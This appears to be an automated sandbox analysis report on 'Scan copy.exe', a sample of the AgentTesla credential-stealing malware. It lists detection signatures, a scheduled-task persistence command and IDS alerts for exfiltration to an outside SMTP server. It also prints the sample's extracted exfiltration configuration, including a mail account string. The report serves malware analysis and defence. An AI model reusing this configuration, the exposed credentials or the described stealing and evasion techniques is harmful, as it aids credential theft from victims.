Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Scan copy.exe

Overview

General Information

Sample Name:Scan copy.exe
Analysis ID:433218
MD5:502390a59aad886fa91210a1b89c89b5
SHA1:b5ccfd3c93f4625bb46ddfb6bd314c7533653368
SHA256:661bb6d9fd6302e1c06c8d3d6182720259df9ce73b5251127c21eb4883ebcf7f
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Contains functionality to register a low level keyboard hook
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Scan copy.exe (PID: 6048 cmdline: 'C:\Users\user\Desktop\Scan copy.exe' MD5: 502390A59AAD886FA91210A1B89C89B5)
    • schtasks.exe (PID: 5472 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\emmrGOU' /XML 'C:\Users\user\AppData\Local\Temp\tmp3F10.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Scan copy.exe (PID: 5988 cmdline: C:\Users\user\Desktop\Scan copy.exe MD5: 502390A59AAD886FA91210A1B89C89B5)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "maksat@atlmexco.comMa1301smtp.atlmexco.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.Scan copy.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              7.2.Scan copy.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Scan copy.exe.3dd5270.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Scan copy.exe.3dd5270.2.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.Scan copy.exe.3dd5270.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "maksat@atlmexco.comMa1301smtp.atlmexco.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\emmrGOU.exeReversingLabs: Detection: 17%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Scan copy.exeReversingLabs: Detection: 17%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\emmrGOU.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: Scan copy.exeJoe Sandbox ML: detected
                      Source: 7.2.Scan copy.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.0.Scan copy.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: Scan copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Scan copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\fXDNGqRoBT\src\obj\x86\Debug\PermissionSetEntryFieldId.pdb source: Scan copy.exe
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\fXDNGqRoBT\src\obj\x86\Debug\PermissionSetEntryFieldId.pdb8 source: Scan copy.exe
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49744 -> 93.89.24.35:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49745 -> 93.89.24.35:587
                      Source: global trafficTCP traffic: 192.168.2.3:49744 -> 93.89.24.35:587
                      Source: Joe Sandbox ViewASN Name: BKVG-ASDE BKVG-ASDE
                      Source: global trafficTCP traffic: 192.168.2.3:49744 -> 93.89.24.35:587
                      Source: unknownDNS traffic detected: queries for: smtp.atlmexco.com
                      Source: Scan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Scan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Scan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmp, Scan copy.exe, 00000007.00000002.475024688.0000000003331000.00000004.00000001.sdmp, Scan copy.exe, 00000007.00000002.474880893.00000000032F9000.00000004.00000001.sdmpString found in binary or memory: http://aJWYmLGLhn6n2.org
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: Scan copy.exe, 00000000.00000002.226113577.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Scan copy.exe, 00000007.00000002.475024688.0000000003331000.00000004.00000001.sdmpString found in binary or memory: http://smtp.atlmexco.com
                      Source: Scan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://uZoqoU.com
                      Source: Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Scan copy.exe, 00000000.00000003.208021704.0000000005CB6000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                      Source: Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmll
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Scan copy.exe, 00000000.00000003.208701839.0000000005CAE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: Scan copy.exe, 00000000.00000003.209057239.0000000005C89000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html2U
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic$
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd
                      Source: Scan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comascC
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                      Source: Scan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comionmy
                      Source: Scan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
                      Source: Scan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: Scan copy.exe, 00000000.00000003.202582104.0000000005C8B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Scan copy.exe, 00000000.00000003.205522633.0000000005C76000.00000004.00000001.sdmp, Scan copy.exe, 00000000.00000003.204749021.0000000005C77000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Scan copy.exe, 00000000.00000003.204992463.0000000005C78000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Scan copy.exe, 00000000.00000003.205522633.0000000005C76000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnQ
                      Source: Scan copy.exe, 00000000.00000003.204490000.0000000005C7E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnn
                      Source: Scan copy.exe, 00000000.00000003.212350163.0000000005C83000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Scan copy.exe, 00000000.00000003.212350163.0000000005C83000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmTP
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
                      Source: Scan copy.exe, 00000000.00000003.207626091.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
                      Source: Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/J
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/het
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/hetJ
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/n
                      Source: Scan copy.exe, 00000000.00000003.207626091.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/siv
                      Source: Scan copy.exe, 00000000.00000003.207626091.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/uea$
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/vaoC
                      Source: Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/y
                      Source: Scan copy.exe, 00000000.00000003.201854697.0000000005C73000.00000004.00000001.sdmp, Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Scan copy.exe, 00000000.00000003.201854697.0000000005C73000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comr-t
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmp, Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com(.
                      Source: Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comx
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Scan copy.exe, 00000000.00000003.203905958.0000000005C8B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com%Q
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Scan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Scan copy.exe, 00000000.00000002.226158460.0000000002C11000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: Scan copy.exe, 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, Scan copy.exe, 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Scan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_011C05C8 SetWindowsHookExW 0000000D,00000000,?,?
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\Scan copy.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Scan copy.exe
                      Source: C:\Users\user\Desktop\Scan copy.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 7.2.Scan copy.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE75C8CE5u002d1AF8u002d4CE0u002d84ABu002d1AA9008845DAu007d/u0034688D7C8u002d0AC5u002d4F49u002d92F7u002d0AB75E92AF93.csLarge array initialization: .cctor: array initializer size 11926
                      Source: 7.0.Scan copy.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE75C8CE5u002d1AF8u002d4CE0u002d84ABu002d1AA9008845DAu007d/u0034688D7C8u002d0AC5u002d4F49u002d92F7u002d0AB75E92AF93.csLarge array initialization: .cctor: array initializer size 11926
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07278F50
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07279580
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0727CC40
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07278480
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07278808
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07278F40
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_072787FA
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07279570
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07278472
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07275CE0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07275CD2
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0727A3B0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0727E3B8
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_0727A39F
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07274928
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07274919
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07274148
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07274158
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_072731C0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07270039
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07270040
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_072738A0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_07273889
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BE7A60
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEAC78
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BECD40
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEBE58
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEB4B0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEE840
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEB939
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEB948
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BE7A51
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEABE0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEEB30
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEDC80
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEEED8
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEBE4A
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEF0F8
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEA0F0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEA0E1
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BE0039
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BE0040
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEF358
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BE74B0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BEB4A2
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 0_2_08BE74A0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_011CD138
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_011CA1B0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_011CCF48
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_011CBBE4
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_011C0C80
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_014946A0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_014945B0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_01494630
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_0149DA30
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_0153C95C
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_01532B08
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_015313C8
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_0153B5C8
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_015346B0
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_01546890
                      Source: C:\Users\user\Desktop\Scan copy.exeCode function: 7_2_01545B30
                      Source: Scan copy.exe, 00000000.00000002.226113577.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameyZmFnldYFSznTuqDxTayTtUJG.exe4 vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000000.198627508.0000000000962000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePermissionSetEntryFieldId.exeZ vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000002.239479824.000000000E910000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000002.239479824.000000000E910000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000003.218712223.0000000003EDF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000002.239367857.000000000E820000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs Scan copy.exe
                      Source: Scan copy.exe, 00000000.00000002.238846395.0000000008A90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Scan copy.exe
                      Source: Scan copy.exe, 00000007.00000000.224533623.0000000000D62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePermissionSetEntryFieldId.exeZ vs Scan copy.exe
                      Source: Scan copy.exe, 00000007.00000002.477924509.0000000006430000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Scan copy.exe
                      Source: Scan copy.exe, 00000007.00000002.467056763.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameyZmFnldYFSznTuqDxTayTtUJG.exe4 vs Scan copy.exe
                      Source: Scan copy.exe, 00000007.00000002.469694000.00000000011D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs Scan copy.exe
                      Source: Scan copy.exe, 00000007.00000002.469262654.00000000010F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Scan copy.exe
                      Source: Scan copy.exeBinary or memory string: OriginalFilenamePermissionSetEntryFieldId.exeZ vs Scan copy.exe
                      Source: Scan copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Scan copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: emmrGOU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 7.2.Scan copy.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.Scan copy.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.Scan copy.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.0.Scan copy.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@1/1
                      Source: C:\Users\user\Desktop\Scan copy.exeFile created: C:\Users\user\AppData\Roaming\emmrGOU.exeJump to behavior
                      Source: C:\Users\user\Desktop\Scan copy.exeMutant created: \Sessions\1\BaseNamedObjects\QnZoDGZEfCHgFbAtrpNXfgIt
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_01
                      Source: C:\Users\user\Desktop\Scan copy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3F10.tmpJump to behavior
                      Source: Scan copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Scan copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Scan copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Scan copy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
